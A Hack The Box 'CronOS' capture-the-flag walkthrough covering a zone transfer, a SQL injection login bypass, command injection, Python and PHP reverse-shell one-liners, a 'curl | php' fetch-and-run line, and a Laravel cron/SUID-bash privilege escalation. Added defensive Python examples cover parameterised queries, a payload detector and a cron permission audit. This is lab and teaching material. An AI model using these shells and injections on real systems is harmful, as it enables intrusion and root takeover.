HTB CronOS Writeup


Nmap scan:

    Host is up (0.11s latency).
    Not shown: 997 filtered tcp ports (no-response)
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
    |   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
    |_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
    53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
    | dns-nsid: 
    |_  bind.version: 9.10.3-P4-Ubuntu
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-title: Apache2 Ubuntu Default Page: It works
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP enum:

  • Default server page found for apache2

Since the box runs BIND on port 53, try nslookup, pointing it at the target's own DNS server:

    nslookup
    > server IP

The reverse lookup of the box shows it is hosting cronos.htb.

Now that we know it's hosting cronos.htb, let's try a zone transfer to discover any other subdomains:

    dig AXFR cronos.htb @IP

Gobuster didn't find anything.

Save the subdomains found by the zone transfer to /etc/hosts.

Found the admin page.

Try SQL injection on the login form: save the POST request as login.req and run

    sqlmap -r login.req

A redirect was happening, which got in the way.

Tried putting '-- - in the username field and it worked! (Intercept the request in Burp Suite and URL-encode the payload.)

Now we can execute commands: the admin page has a command field, and by adjusting it in Burp Suite I was able to execute a command of my own.
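What the '-- - payload actually does to the login query, shown as an added Python example that is not part of this writeup: a constructed in-memory sqlite3 users table (the admin page's real backend and schema are not shown on the page) is queried first the way a string-concatenating login does, then with bound parameters. The quote closes the username literal and the comment sequence removes the password check in the first version; in the second the same characters are just data.

```python
import sqlite3

# Constructed in-memory stand-in for the admin page's user table; the box's
# real schema is not shown in the writeup.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    conn.commit()
    return conn

def build_vulnerable_query(username, password):
    # The user-controlled strings are spliced straight into the SQL text.
    return ("SELECT username FROM users WHERE username = '%s' "
            "AND password = '%s'" % (username, password))

def login_vulnerable(conn, username, password):
    # A quote closes the literal and "-- " comments out the rest of the line,
    # so the row is matched on username alone and the password is never checked.
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row is not None

def login_safe(conn, username, password):
    # Bound parameters: the values travel separately from the SQL text, so
    # quotes and comment markers inside them are just characters.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(query, (username, password)).fetchone()
    return row is not None

# Constructed payload in the style of the writeup: a known username followed
# by the quote-and-comment sequence.
BYPASS_USERNAME = "admin'-- -"

if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query(BYPASS_USERNAME, "wrong"))
    print("string-built login accepts bad password:", login_vulnerable(db, BYPASS_USERNAME, "wrong"))
    print("parameterised login accepts bad password:", login_safe(db, BYPASS_USERNAME, "wrong"))
```

Printing the built query makes the mechanism visible: everything after the injected quote up to the end of the line is a comment to the database engine, which is why sqlmap's own probes and the manual payload are both variations on the same theme.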

Let's try a one-liner to get a reverse shell (the listener address in the connect() call is blank in the original notes):

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Make sure to URL-encode it. Got the reverse shell!

Upgraded the shell to a PTY with

    python -c 'import pty; pty.spawn("/bin/sh")'
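Both payloads above only worked once URL-encoded, which is the detail a detection rule most often gets wrong. As an added Python example (not from the writeup), here is a small request-body inspector of the kind that would sit in an application middleware or WAF: it URL-decodes every parameter repeatedly before matching, so single- and double-encoded payloads are inspected in the clear, and it flags the quote-plus-comment sequence used on the login form and shell metacharacters in the command field. The request paths and bodies are constructed samples; /admin/index.php and /admin/cmd.php are hypothetical names, not the box's real endpoints.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# A quote followed by a SQL comment opener (the writeup's '-- - style), and
# shell metacharacters that chain or substitute commands.
SQL_COMMENT = re.compile(r"'\s*(?:--|#|/\*)")
SHELL_META = re.compile(r"[;&|`\n]|\$\(")

def fully_decode(value, limit=3):
    # Undo repeated URL encoding so a double-encoded payload is matched in clear.
    for _ in range(limit):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_body(path, body):
    # Returns (path, parameter, reason) for every suspicious form field.
    findings = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            clear = fully_decode(value)
            if SQL_COMMENT.search(clear):
                findings.append((path, name, "sql-comment"))
            if SHELL_META.search(clear):
                findings.append((path, name, "shell-meta"))
    return findings

# Constructed sample POST bodies; the paths are hypothetical, not the box's own.
SAMPLE_REQUESTS = [
    ("/admin/index.php", "username=admin%27--+-&password=x"),       # login bypass
    ("/admin/cmd.php", "command=traceroute&host=8.8.8.8"),           # benign
    ("/admin/cmd.php", "command=traceroute&host=8.8.8.8%3Bid"),      # chained command
    ("/admin/cmd.php", "command=traceroute&host=8.8.8.8%253Bid"),    # double-encoded
]

def scan(requests=SAMPLE_REQUESTS):
    out = []
    for path, body in requests:
        out.extend(inspect_body(path, body))
    return out

if __name__ == "__main__":
    for path, name, reason in scan():
        print(f"{path}: parameter '{name}' flagged ({reason})")
```

The benign traceroute request produces nothing, while the double-encoded variant is caught only because of the decode loop; a matcher run on the raw body would see %253B and move on.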


  • host the and run it

Found a suspicious cron job running as root:

    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

artisan's scheduler runs whatever jobs are defined in Laravel's Kernel.php, so that is where we can plant one:


How to set up a scheduled job that runs terminal commands (Laravel docs pattern):

    protected function schedule(Schedule $schedule)
    {
        // no frequency chained, so Laravel's default expression (every minute) applies
        $schedule->exec('cd ~/Code/lpg && ls');
    }

Locate the file:

    find / -name Kernel.php 2>/dev/null

The entry to add to the schedule (the attacker host in fsockopen is blank in the original notes), and the same one-liner on its own:

    $schedule->exec('php -r \'$sock=fsockopen("",7777);exec("/bin/sh -i <&3 >&3 2>&3");\'')->everyMinute();

    php -r '$sock=fsockopen("",7777);exec("/bin/sh -i <&3 >&3 2>&3");'

I located the file in the html directory and downloaded it by visiting the site.

Used this guy's method:

let’s just make a temporary copy of bash (as root) and give it the SUID bit.

We add the following code to Kernel.php:

    protected function schedule(Schedule $schedule)
    {
        $cmd = 'cp $(which bash) /tmp/sbash; chmod +s /tmp/sbash';
        // the scheduler only runs what is registered; every minute to match the cron
        $schedule->exec($cmd)->everyMinute();
    }

…then wait a minute for the cron and eventually execute ./sbash -p from /tmp.

Another method would be to edit the artisan file itself and let the system download a reverse shell from our host and execute it (the URL is blank in the original notes):

    <?php system('curl | php') ?>
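The root-level weakness behind both methods is the same: a root cron job executes code (artisan, and through it Kernel.php) that lives under a directory the web user owns. As an added Python example that is not part of the writeup, here is a small audit that parses system-crontab lines, keeps the jobs running as root, and flags any absolute path in the command, or any directory above it, that is owned by or writable for a non-root user. The crontab text and the ownership table are constructed; uid 33 stands for www-data as on Debian and Ubuntu. Pass real_stat instead of fake_stat to run it against a live filesystem.

```python
import os
import shlex
import stat

# Constructed system-crontab text (schedule, user, command), modelled on the
# job the writeup found; the other two lines are made up for contrast.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
* * * * *   root     php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
17 *  * * * root     cd / && run-parts --report /etc/cron.hourly
*/5 * * * * www-data php /var/www/laravel/artisan queue:work
"""

# Constructed ownership table standing in for os.stat: path -> (uid, gid, mode).
# uid/gid 33 is www-data on Debian and Ubuntu.
FAKE_FS = {
    "/": (0, 0, 0o755),
    "/var": (0, 0, 0o755),
    "/var/www": (0, 0, 0o755),
    "/var/www/laravel": (33, 33, 0o755),
    "/var/www/laravel/artisan": (33, 33, 0o644),
    "/etc": (0, 0, 0o755),
    "/etc/cron.hourly": (0, 0, 0o755),
}

def fake_stat(path):
    return FAKE_FS.get(path)

def real_stat(path):
    # Drop-in replacement for fake_stat on a live host.
    try:
        st = os.stat(path)
    except OSError:
        return None
    return (st.st_uid, st.st_gid, stat.S_IMODE(st.st_mode))

def parse_system_crontab(text):
    # Returns (user, command) for ordinary five-field lines; comments, blank
    # lines, VAR=value lines and @reboot-style shortcuts are skipped.
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("@"):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7 or "=" in fields[0]:
            continue
        jobs.append((fields[5], fields[6]))
    return jobs

def paths_in_command(command):
    # Absolute paths mentioned in the command, minus redirection targets
    # (/dev/null after ">>" is written to, not executed). Bare names such as
    # run-parts are not resolved through PATH here.
    try:
        tokens = shlex.split(command)
    except ValueError:
        tokens = command.split()
    paths, prev = [], ""
    for tok in tokens:
        if tok.startswith("/") and tok != "/" and not prev.endswith((">", "<")):
            paths.append(tok)
        prev = tok
    return paths

def writable_by_non_root(info):
    uid, gid, mode = info
    return (uid != 0 or bool(mode & stat.S_IWOTH)
            or (bool(mode & stat.S_IWGRP) and gid != 0))

def audit_root_jobs(crontab_text, stat_fn=fake_stat):
    # Returns (command, path, uid) for every path a root job touches that a
    # non-root user could modify, checking the file and each parent directory
    # (a writable parent lets the file be swapped out wholesale).
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for path in paths_in_command(command):
            current = path
            while True:
                info = stat_fn(current)
                if info is not None and writable_by_non_root(info):
                    findings.append((command, current, info[0]))
                parent = os.path.dirname(current)
                if parent == current:
                    break
                current = parent
    return findings

if __name__ == "__main__":
    for command, path, uid in audit_root_jobs(SAMPLE_CRONTAB):
        print(f"root job '{command}' depends on {path} (owned by uid {uid})")
```

On the sample input the artisan job is reported twice, once for the script and once for the laravel directory that contains it (and Kernel.php), the run-parts job is clean, and the www-data job is ignored because nothing it does runs as root. Either finding is enough to turn a web-shell foothold into root, which is the fix to prioritise: root-owned, root-writable-only paths for anything cron executes as root.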

